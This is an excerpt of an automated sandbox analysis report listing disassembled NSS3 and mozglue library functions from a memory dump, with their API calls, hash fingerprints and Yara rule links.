                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CB738A2), ref: 6CB73DB0
                                                                        • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CB738A2), ref: 6CB73DBF
                                                                          • Part of subcall function 6CB70BE0: malloc.MOZGLUE(6CB68D2D,?,00000000,?), ref: 6CB70BF8
                                                                          • Part of subcall function 6CB70BE0: TlsGetValue.KERNEL32(6CB68D2D,?,00000000,?), ref: 6CB70C15
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CB738A2), ref: 6CB73DD9
                                                                        • _wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6CB738A2), ref: 6CB73DE7
                                                                        • free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6CB738A2), ref: 6CB73DF8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
                                                                        • String ID:
                                                                        • API String ID: 1642359729-0
                                                                        • Opcode ID: 25e541addd93de5d5ebcc426b52246a936b58b2ae7a1898af7d4a3f5a5a02cca
                                                                        • Instruction ID: c085140e603df609f98dde7c8775ec8bdbdd1d0cd34103026e4174161e8f027f
                                                                        • Opcode Fuzzy Hash: 25e541addd93de5d5ebcc426b52246a936b58b2ae7a1898af7d4a3f5a5a02cca
                                                                        • Instruction Fuzzy Hash: 2E01D6B5B051623BFF2056B76D49E3B397CDB416A8B240235FD39DA680EA51CC1082F2
                                                                        Function 6CBA2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CBA5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBA5B56
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBA2CEC
                                                                          • Part of subcall function 6CBBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBBC2BF
                                                                        • PR_EnterMonitor.NSS3(?), ref: 6CBA2D02
                                                                        • PR_EnterMonitor.NSS3(?), ref: 6CBA2D1F
                                                                        • PR_ExitMonitor.NSS3(?), ref: 6CBA2D42
                                                                        • PR_ExitMonitor.NSS3(?), ref: 6CBA2D5B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                        • String ID:
                                                                        • API String ID: 1593528140-0
                                                                        • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                        • Instruction ID: aa1f3b41fba521813908b68751f8faee64cc392dc498c077ace985adb8e2bb89
                                                                        • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                        • Instruction Fuzzy Hash: F60108B59142806BE6309E66FC40BCBB3A5EF41318F004525E8DD86711E632F41AC793
                                                                        Function 6CBA2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CBA5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBA5B56
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBA2D9C
                                                                          • Part of subcall function 6CBBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBBC2BF
                                                                        • PR_EnterMonitor.NSS3(?), ref: 6CBA2DB2
                                                                        • PR_EnterMonitor.NSS3(?), ref: 6CBA2DCF
                                                                        • PR_ExitMonitor.NSS3(?), ref: 6CBA2DF2
                                                                        • PR_ExitMonitor.NSS3(?), ref: 6CBA2E0B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                        • String ID:
                                                                        • API String ID: 1593528140-0
                                                                        • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                        • Instruction ID: 28f8559efa27dfaa5f3deb330a1ee92001e5433cedbb25f7011e82df38dc29f1
                                                                        • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                        • Instruction Fuzzy Hash: EE01C8B59046806BE6309E66FC01BCBB7A5EF41318F044435E8DD87B11D632F51AC693
                                                                        Function 6CC2BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CC27AFE,?,?,?,?,?,?,?,?,6CC2798A), ref: 6CC2BDC3
                                                                        • free.MOZGLUE(?,?,6CC27AFE,?,?,?,?,?,?,?,?,6CC2798A), ref: 6CC2BDCA
                                                                        • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CC27AFE,?,?,?,?,?,?,?,?,6CC2798A), ref: 6CC2BDE9
                                                                        • free.MOZGLUE(?,00000000,00000000,?,6CC27AFE,?,?,?,?,?,?,?,?,6CC2798A), ref: 6CC2BE21
                                                                        • free.MOZGLUE(00000000,00000000,?,6CC27AFE,?,?,?,?,?,?,?,?,6CC2798A), ref: 6CC2BE32
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                        • String ID:
                                                                        • API String ID: 3662805584-0
                                                                        • Opcode ID: 6e7c1faaa3aeb6c5f06dc877c536604a7dd0d97b20481698a069a60fdeeb4cdd
                                                                        • Instruction ID: f38ff1dd2f6460414a06c92290d31e7dbc6e61aa7feb1e30b5b3a91ac131f5d1
                                                                        • Opcode Fuzzy Hash: 6e7c1faaa3aeb6c5f06dc877c536604a7dd0d97b20481698a069a60fdeeb4cdd
                                                                        • Instruction Fuzzy Hash: BE1103B5B01260DFDF02DF2AC86DB423BB5FB4A254F04006AE54A87710E735A816DBB1
                                                                        Function 6CC27C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_Free.NSS3(?), ref: 6CC27C73
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC27C83
                                                                        • malloc.MOZGLUE(00000001), ref: 6CC27C8D
                                                                        • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC27C9F
                                                                        • PR_GetCurrentThread.NSS3 ref: 6CC27CAD
                                                                          • Part of subcall function 6CBD9BF0: TlsGetValue.KERNEL32(?,?,?,6CC20A75), ref: 6CBD9C07
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 105370314-0
                                                                        • Opcode ID: 30a46adcd01631cf67d05fe484c5d43dfe02054d0cc08c397d6a14fdec4f0ebf
                                                                        • Instruction ID: 249ad2a86a8b72c524fe5dc6eb47d0018a3fdd0e1e8155b6a51b0bcaab7d0e88
                                                                        • Opcode Fuzzy Hash: 30a46adcd01631cf67d05fe484c5d43dfe02054d0cc08c397d6a14fdec4f0ebf
                                                                        • Instruction Fuzzy Hash: 73F0C2B1D102166BEB009F7BDC0995B7758EF00265B018439E809C3B00FB39E514CBE5
                                                                        Function 6CC2ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteCriticalSection.KERNEL32(6CC2A6D8), ref: 6CC2AE0D
                                                                        • free.MOZGLUE(?), ref: 6CC2AE14
                                                                        • DeleteCriticalSection.KERNEL32(6CC2A6D8), ref: 6CC2AE36
                                                                        • free.MOZGLUE(?), ref: 6CC2AE3D
                                                                        • free.MOZGLUE(00000000,00000000,?,?,6CC2A6D8), ref: 6CC2AE47
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$CriticalDeleteSection
                                                                        • String ID:
                                                                        • API String ID: 682657753-0
                                                                        • Opcode ID: 35fdc99e7336fedce9227de4fe0ba2cbc38a7a9bafc723aaf3707f0b7a7d8a66
                                                                        • Instruction ID: 62309bf112921c95413112ec7cf759bcc59e5ffe46b363268e5f91a1fa963263
                                                                        • Opcode Fuzzy Hash: 35fdc99e7336fedce9227de4fe0ba2cbc38a7a9bafc723aaf3707f0b7a7d8a66
                                                                        • Instruction Fuzzy Hash: 18F0F6B5201A01ABCF009F6AD8489277778BFC67747100329E12A83941E735E022C7D1
                                                                        Function 6CAB7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAB7D35
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: sqlite3_log
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                        • API String ID: 632333372-598938438
                                                                        • Opcode ID: f801cff34969e5d1362089ae80eb87e1ac589e15352a69ea79a804ca0b8c1255
                                                                        • Instruction ID: e8aead154abb7513face02f6f4b96f40aaf15b807eb51b70cb49bfbd96443b64
                                                                        • Opcode Fuzzy Hash: f801cff34969e5d1362089ae80eb87e1ac589e15352a69ea79a804ca0b8c1255
                                                                        • Instruction Fuzzy Hash: 7B313731E042299BC710CF9EC8809BDB7F6EF44345B59419AE444F7B81E2B1E8A1CBB4
                                                                        Function 6CAA6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CAA6D36
                                                                        Strings
                                                                        • %s at line %d of [%.10s], xrefs: 6CAA6D2F
                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAA6D20
                                                                        • database corruption, xrefs: 6CAA6D2A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: sqlite3_log
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                        • API String ID: 632333372-598938438
                                                                        • Opcode ID: 1a42c572a242bcd49d5b74a3ffe7c60804cf2eace9b5583b2ccd773b9dbe5bc2
                                                                        • Instruction ID: 77de80f71262baf561137cc83a68cc4fe55c620060662f40429a1eb60b2da946
                                                                        • Opcode Fuzzy Hash: 1a42c572a242bcd49d5b74a3ffe7c60804cf2eace9b5583b2ccd773b9dbe5bc2
                                                                        • Instruction Fuzzy Hash: 6B21F430600B059BC710CE6DC941B5AB7F2AF84348F14852DD85A9BF51E371F9CA8B92
                                                                        Function 6CBDCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CBDCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CBDCC7B), ref: 6CBDCD7A
                                                                          • Part of subcall function 6CBDCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CBDCD8E
                                                                          • Part of subcall function 6CBDCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CBDCDA5
                                                                          • Part of subcall function 6CBDCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CBDCDB8
                                                                        • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CBDCCB5
                                                                        • memcpy.VCRUNTIME140(6CC714F4,6CC702AC,00000090), ref: 6CBDCCD3
                                                                        • memcpy.VCRUNTIME140(6CC71588,6CC702AC,00000090), ref: 6CBDCD2B
                                                                          • Part of subcall function 6CAF9AC0: socket.WSOCK32(?,00000017,6CAF99BE), ref: 6CAF9AE6
                                                                          • Part of subcall function 6CAF9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CAF99BE), ref: 6CAF9AFC
                                                                          • Part of subcall function 6CB00590: closesocket.WSOCK32(6CAF9A8F,?,?,6CAF9A8F,00000000), ref: 6CB00597
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                        • String ID: Ipv6_to_Ipv4 layer
                                                                        • API String ID: 1231378898-412307543
                                                                        • Opcode ID: 1bfd8613c71b9a1e7124969712f225c36fc6487863419a2a7ce72657fcf29caf
                                                                        • Instruction ID: 594219b9228451e56c452f4bbf1ccb41c4b74ea3a1b0656d73216b75737c3b4b
                                                                        • Opcode Fuzzy Hash: 1bfd8613c71b9a1e7124969712f225c36fc6487863419a2a7ce72657fcf29caf
                                                                        • Instruction Fuzzy Hash: FC11A2F1B102605EDB569F6D9867B423AB8E346258F181029E50ECBB41F775D4048BF6
                                                                        Function 6CB41CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_Initialize), ref: 6CB41CD8
                                                                        • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CB41CF1
                                                                          • Part of subcall function 6CC209D0: PR_Now.NSS3 ref: 6CC20A22
                                                                          • Part of subcall function 6CC209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC20A35
                                                                          • Part of subcall function 6CC209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC20A66
                                                                          • Part of subcall function 6CC209D0: PR_GetCurrentThread.NSS3 ref: 6CC20A70
                                                                          • Part of subcall function 6CC209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC20A9D
                                                                          • Part of subcall function 6CC209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC20AC8
                                                                          • Part of subcall function 6CC209D0: PR_vsmprintf.NSS3(?,?), ref: 6CC20AE8
                                                                          • Part of subcall function 6CC209D0: EnterCriticalSection.KERNEL32(?), ref: 6CC20B19
                                                                          • Part of subcall function 6CC209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC20B48
                                                                          • Part of subcall function 6CC209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC20C76
                                                                          • Part of subcall function 6CC209D0: PR_LogFlush.NSS3 ref: 6CC20C7E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                        • String ID: pInitArgs = 0x%p$C_Initialize
                                                                        • API String ID: 1907330108-3943720641
                                                                        • Opcode ID: 2dbeba6c30c3268f3a9032bb01163ce186325464d473330f4ff364bf00d2300b
                                                                        • Instruction ID: 7cf8773e669ccb6af459d35a1b56ac1215b7d2f2ee7a78e6c0441b6e521ba4ae
                                                                        • Opcode Fuzzy Hash: 2dbeba6c30c3268f3a9032bb01163ce186325464d473330f4ff364bf00d2300b
                                                                        • Instruction Fuzzy Hash: 2B01D2747001A0DFDF01AB14D91CB5937B4EB8232AF088025E409D2611EB34D849E7B2
                                                                        Function 6CBE7DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CBE7E10
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CBE7EA6
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CBE7EB5
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CBE7ED8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: _byteswap_ulong
                                                                        • String ID:
                                                                        • API String ID: 4101233201-0
                                                                        • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                        • Instruction ID: c3db1bb9717c10fc6e696b16107501793deeead052bdb68226a391b023d78a36
                                                                        • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                        • Instruction Fuzzy Hash: D431B5B1A002118FDB04CF18D89099ABBE6FF8831871B817AC8596B712EB75EC45CBD1
                                                                        Function 6CB82C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_SetError.NSS3(FFFFE002,00000000,?,6CB81289,?), ref: 6CB82D72
                                                                          • Part of subcall function 6CB83390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6CB82CA7,E80C76FF,?,6CB81289,?), ref: 6CB833E9
                                                                          • Part of subcall function 6CB83390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6CB8342E
                                                                        • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB81289,?), ref: 6CB82D61
                                                                          • Part of subcall function 6CB80B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB80B21
                                                                          • Part of subcall function 6CB80B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB80B64
                                                                        • PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6CB81289,?), ref: 6CB82D88
                                                                        • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6CB81289,?), ref: 6CB82DAF
                                                                          • Part of subcall function 6CB3B8F0: PR_CallOnceWithArg.NSS3(6CC72178,6CB3BCF0,?), ref: 6CB3B915
                                                                          • Part of subcall function 6CB3B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CB3B933
                                                                          • Part of subcall function 6CB3B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CB3B9C8
                                                                          • Part of subcall function 6CB3B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CB3B9E1
                                                                          • Part of subcall function 6CB80A50: SECOID_GetAlgorithmTag_Util.NSS3(6CB82A90,E8571076,?,6CB82A7C,6CB821F1,?,?,?,00000000,00000000,?,?,6CB821DD,00000000), ref: 6CB80A66
